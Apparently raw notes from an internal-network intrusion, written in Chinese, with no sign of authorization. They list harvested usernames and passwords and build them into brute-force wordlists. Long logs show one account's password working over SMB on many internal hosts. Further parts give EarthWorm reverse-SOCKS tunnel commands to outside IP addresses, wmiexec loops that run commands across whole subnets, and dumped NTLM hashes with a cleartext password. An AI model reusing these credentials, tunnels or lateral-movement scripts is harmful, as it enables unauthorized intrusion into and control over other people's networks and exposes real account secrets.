渗透测试之内网渗透(D-Link)
信息收集
内网信息收集
用户名
root
wklautoacc1
backup
gameac
wkljohn
john
administrator
workingmachine
myst
zongmux693
kaikikai1025
catchithk
waishing163163
vincentchan0224
echo -e 'root\nwklautoacc1\nbackup\ngameac\nwkljohn\njohn\nadministrator\nworkingmachine\nmyst\nzongmux693\nkaikikai1025\ncatchithk\nwaishing163163' > user.txt
echo -e 'root\nbackup\ngameac\nwkljohn\njohn\nadministrator\nworkingmachine\nmyst\nzongmux693\nkaikikai1025\ncatchithk\nwaishing163163' > user.txt
echo -e 'root\ngameac\nwkljohn\njohn\nadministrator\nworkingmachine\nmyst\nzongmux693\nkaikikai1025\ncatchithk\nwaishing163163' > user.txt
密码
fnnet3721
joinmygame
YnLKWhUYCQrSOjeq
Ev95813033884422*
Ev33884422958130*
788290
ev788290
Ev12345678*
Ev12345678
33884422
mystberry
zongmux693
kaikikai1025
catchithk
waishing163163
cxc2605363
echo -e 'fnnet3721\njoinmygame\nYnLKWhUYCQrSOjeq\nEv95813033884422*\nEv33884422958130*\n788290\nEv12345678*\n33884422\nEv12345678\nmystberry\nzongmux693\nkaikikai1025\ncatchithk\nwaishing163163' > pass.txt
爆破记录
192.168.1.172 backup YnLKWhUYCQrSOjeq ISOK
192.168.1.106 backup YnLKWhUYCQrSOjeq ISOK
----smb----
2023/02/17 15:52:13 Found: 192.168.0.241 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.179 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.76 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.50 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.64 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.189 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.242 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.239 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.236 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.204 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.202 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.134 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.178 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.209 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.208 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.217 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.107 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.109 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.210 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.218 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.166 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.60 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.102 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.177 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.207 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.252 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.214 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.118 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.205 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.206 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.219 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.200 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.188 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.127 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.223 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.240 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.84 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.128 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.86 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.122 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.119 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.254 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.216 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.88 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.251 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.170 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.78 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.126 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.130 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.116 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.65 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.253 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.132 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.71 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.70 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.75 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.131 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.67 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.85 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.69 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.238 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.129 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.232 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.191 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.176 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.73 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.72 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.66 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.159 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.231 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.115 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.133 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.230 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.111 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.87 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.199 wklautoacc1 Ev12345678* ISOK
2023/02/17 15:52:13 Found: 192.168.0.74 wklautoacc1 Ev12345678* ISOK
[+] SMB:192.168.1.58:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.65:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.161:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.43:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.236:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.177:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.103:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.12:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.89:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.88:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.83:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.114:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.74:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.207:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.222:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.226:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.47:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.45:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.150:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.245:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.37:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.99:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.13:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.145:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.46:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.10:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.149:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.250:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.9:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.93:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.17:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.6:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.16:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.189:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.188:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.5:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.218:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.36:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.223:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.241:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.90:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.113:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.23:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.3:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.147:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.118:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.249:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.11:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.79:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.2:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.196:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.158:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.14:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.7:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.42:445:wklautoacc1 Ev12345678*
[+] SMB:192.168.1.4:445:wklautoacc1 Ev12345678*
内网代理
ew
Server
./ew -s rcsocks -l 10808 -e 18888
Client
./ee -s rssocks -d 107.174.115.127 -e 18888
./ee -s rssocks -d 193.29.189.231 -e 18888
wklautoacc1@Ev12345678*
wklautoacc1:Ev12345678*@192.168.0.74 "whoami"
#!/bin/bash
for((i=1;i<=254;i++));
do
exec="./wmiexec wklautoacc1:Ev12345678*@192.168.0.{exec}
done
echo -e '#!/bin/bash\nfor((i=1;i<=254;i++));\ndo\nexec="./wmiexec wklautoacc1:Ev12345678*@192.168.1.i whoami"\n{exec}\ndone' > run.sh;chmod +x run.sh
echo -e '#!/bin/bash\nfor((i=1;i<=254;i++));\ndo\nexec="./wmiexec wklautoacc1:Ev12345678*@192.168.0.i whoami"\n{exec}\ndone' > run.sh;chmod +x run.sh
公网
Hash
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5eff09e2254bab652671a319c318b3a1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
wklautoacc1:1009:aad3b435b51404eeaad3b435b51404ee:0662b27fc05fd91eb80ccb2b14ad3686:::
用户名密码
* Username : wklautoacc1
* Password : Ev95813033884422*